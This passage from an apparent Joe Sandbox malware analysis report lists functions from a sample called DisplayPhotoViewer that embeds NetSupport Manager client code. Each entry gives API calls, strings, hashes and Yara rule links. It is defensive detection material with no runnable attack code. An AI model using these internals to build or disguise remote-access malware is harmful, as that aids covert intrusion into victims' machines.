                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 819365019-1557312927
                                                                                                    • Opcode ID: c44e849ed5a76402aeb12387f3289cd06f41ee9d37a49bec26aee02e9a5440bc
                                                                                                    • Instruction ID: 6ea8610bb597eb7edb433f4b0277e9b3fa461b8359786599f83c8a8ca8bfa3d4
                                                                                                    • Opcode Fuzzy Hash: c44e849ed5a76402aeb12387f3289cd06f41ee9d37a49bec26aee02e9a5440bc
                                                                                                    • Instruction Fuzzy Hash: E9E04F75A00219BBD710DE55EC84ED6B39DEB94354F00C419F95987240D6B0E8508BA1
                                                                                                    Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 110010E6
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 906220102-1557312927
                                                                                                    • Opcode ID: 6f08d19ed098ce162f06077876b8d221c99d3cecb7b1fddc674d2f1197713961
                                                                                                    • Instruction ID: ebf97419960a6f5fdc7535cf5b438acfbf72653b8571370129838c7334b23970
                                                                                                    • Opcode Fuzzy Hash: 6f08d19ed098ce162f06077876b8d221c99d3cecb7b1fddc674d2f1197713961
                                                                                                    • Instruction Fuzzy Hash: D8E08675A00219BFD710CE55EC45FD7B39DEB88324F00C429F91887640D6B0F8508BA1
                                                                                                    Function 110153A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • KillTimer.USER32(?,?), ref: 110153CB
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 110153B6
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110153B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2229609774-1557312927
                                                                                                    • Opcode ID: 6e9e1a2be1c6ccbce9f6560311eb969b4900f8bb35f2f23db1434ae2ae72eba7
                                                                                                    • Instruction ID: 576bd0a685884d2011e160678ac5fb98489ff94297393d631ba407f82eafea24
                                                                                                    • Opcode Fuzzy Hash: 6e9e1a2be1c6ccbce9f6560311eb969b4900f8bb35f2f23db1434ae2ae72eba7
                                                                                                    • Instruction Fuzzy Hash: 0EE08635600329ABD314DF55EC40E96F3DDEB94314F00C419FD5557740D775E9808BA1
                                                                                                    Function 110A5600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,00001007,00000000,00000000), ref: 110A5632
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                    • String ID: ..\ctl32\listview.cpp$m_hWnd
                                                                                                    • API String ID: 819365019-4033689453
                                                                                                    • Opcode ID: 4958384af931f1911d92bd3e4cf825b6c76d5c567494a1824f866ce1e2d544cf
                                                                                                    • Instruction ID: 205844842ca6098973196131e7e87dc79f896648075e0c62b30092f8f499040e
                                                                                                    • Opcode Fuzzy Hash: 4958384af931f1911d92bd3e4cf825b6c76d5c567494a1824f866ce1e2d544cf
                                                                                                    • Instruction Fuzzy Hash: 2CE02B32B50328BBD3109A55FC01FD6B38CE759711F008039FA8856580D7F1B440C799
                                                                                                    Function 110A5640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,00001008,00000000,00000000), ref: 110A5672
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                    • String ID: ..\ctl32\listview.cpp$m_hWnd
                                                                                                    • API String ID: 819365019-4033689453
                                                                                                    • Opcode ID: d8ad30e877f42191b3707af9e0ef210ce6a44fdc27b6bd52bd5cdc270ceade50
                                                                                                    • Instruction ID: a75a9d38714edc97be7e7536152d2e353e6319c865be528e508ff0e6741c2e2d
                                                                                                    • Opcode Fuzzy Hash: d8ad30e877f42191b3707af9e0ef210ce6a44fdc27b6bd52bd5cdc270ceade50
                                                                                                    • Instruction Fuzzy Hash: 08E02B31B50328BFD3109A55FC41FC2B38CA758711F00803AFA8457580D6B1B540C799
                                                                                                    Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11001126
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001121
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1604732272-1557312927
                                                                                                    • Opcode ID: 7a769bf21f6cbbf8cd891a722b01389bbfc5092aa829b7a9318ac18a31f30692
                                                                                                    • Instruction ID: 82b6675116968cbba7431826d7f6f1639b8507741ba135374402fdd6650ddaf0
                                                                                                    • Opcode Fuzzy Hash: 7a769bf21f6cbbf8cd891a722b01389bbfc5092aa829b7a9318ac18a31f30692
                                                                                                    • Instruction Fuzzy Hash: 20D02E32A10329BBC3248A56EC00FC2F39DAB50368F00C029FA1842240E671E8408BA1
                                                                                                    Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11001016
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001011
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2229609774-1557312927
                                                                                                    • Opcode ID: 9727958a2fbe4fc63bdb410eafa06567ddba4e504227bf5d039023cf564ba0ea
                                                                                                    • Instruction ID: 15cfe6f0e6bdc94c424bf2b0d0ebbdb60de7b5ccdc8d16a94c2b26e45d928c33
                                                                                                    • Opcode Fuzzy Hash: 9727958a2fbe4fc63bdb410eafa06567ddba4e504227bf5d039023cf564ba0ea
                                                                                                    • Instruction Fuzzy Hash: 0AD05B76610329BBD320DA55EC44FD6B3DDD754365F008429F94556540D771E4808791
                                                                                                    Function 1103B2D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(NSMClassList,00000000), ref: 1103B2DF
                                                                                                    • SendMessageA.USER32(00000000,0000065B,?,?), ref: 1103B2F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FindMessageSendWindow
                                                                                                    • String ID: NSMClassList
                                                                                                    • API String ID: 1741975844-2474587545
                                                                                                    • Opcode ID: b0c049857ce6e48c67bf7070006a4c448b2d9710b810442ea78e2e98a851643a
                                                                                                    • Instruction ID: c494c1732d21c8edd6730b2fc9f7ac2cff8271f99dabf9b9961e5f0b5ced6cac
                                                                                                    • Opcode Fuzzy Hash: b0c049857ce6e48c67bf7070006a4c448b2d9710b810442ea78e2e98a851643a
                                                                                                    • Instruction Fuzzy Hash: EFD05E32610224BBD7105B96EC49FABBBADEF89BA6F15C055FA198B184C761D80087E0
                                                                                                    Function 1100D480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(1100D6FE,?,00000000,?,1100CA2A,?), ref: 1100D489
                                                                                                    • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CA2A,?), ref: 1100D498
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoadVersion
                                                                                                    • String ID: AudioCapture.dll
                                                                                                    • API String ID: 3209957514-2642820777
                                                                                                    • Opcode ID: ec670c1b446665b5c9905e3d33e7ab318e6a52990ef39aad6622efeb1ccbc5e4
                                                                                                    • Instruction ID: a709ae7f7c36543edd98efab2f220a2832dc2460317b7b990763dae26f3de570
                                                                                                    • Opcode Fuzzy Hash: ec670c1b446665b5c9905e3d33e7ab318e6a52990ef39aad6622efeb1ccbc5e4
                                                                                                    • Instruction Fuzzy Hash: 7DE01274E1056787F3029B79984838D72E4A780699FC184B1FD11C0948FB28D4409F31
                                                                                                    Function 110150C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000000,1105011B,platformid,00000000,00000000,00000000), ref: 110150D7
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,111762E8,000000FF,?,1105060C), ref: 110150E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                    • String ID: \\.\NSWFPDrv
                                                                                                    • API String ID: 3498533004-85019792
                                                                                                    • Opcode ID: af3aec00ff591c1261cf36fe2803e382e784f461f3e5c430c02267cb1a99150c
                                                                                                    • Instruction ID: 153877e9724d3ff66f8c063fbb054f4def75941df464311efe647e63b7f07564
                                                                                                    • Opcode Fuzzy Hash: af3aec00ff591c1261cf36fe2803e382e784f461f3e5c430c02267cb1a99150c
                                                                                                    • Instruction Fuzzy Hash: 35D0C971A021347AE27115AABC4CFCBBD09EB067B5F254660F92DE51D892544C4186F4
                                                                                                    Function 11139690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strncpy
                                                                                                    • String ID: 1000,50$1000,50
                                                                                                    • API String ID: 2961919466-2776873633
                                                                                                    • Opcode ID: d94f0d834bddf19551337efc7f67368d614e781db5f2e5917047bd9d53d0875b
                                                                                                    • Instruction ID: a1b0f5a988e2b4642303c20028dfaa754ce47f9ae0491c0127ff96aa72eaea39
                                                                                                    • Opcode Fuzzy Hash: d94f0d834bddf19551337efc7f67368d614e781db5f2e5917047bd9d53d0875b
                                                                                                    • Instruction Fuzzy Hash: 69D05EF0A5238C2AFB028A9EA800B65B7CC6B81728F014060B8A8DA250E775E950C752
                                                                                                    Function 110C9920 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 110C994D
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
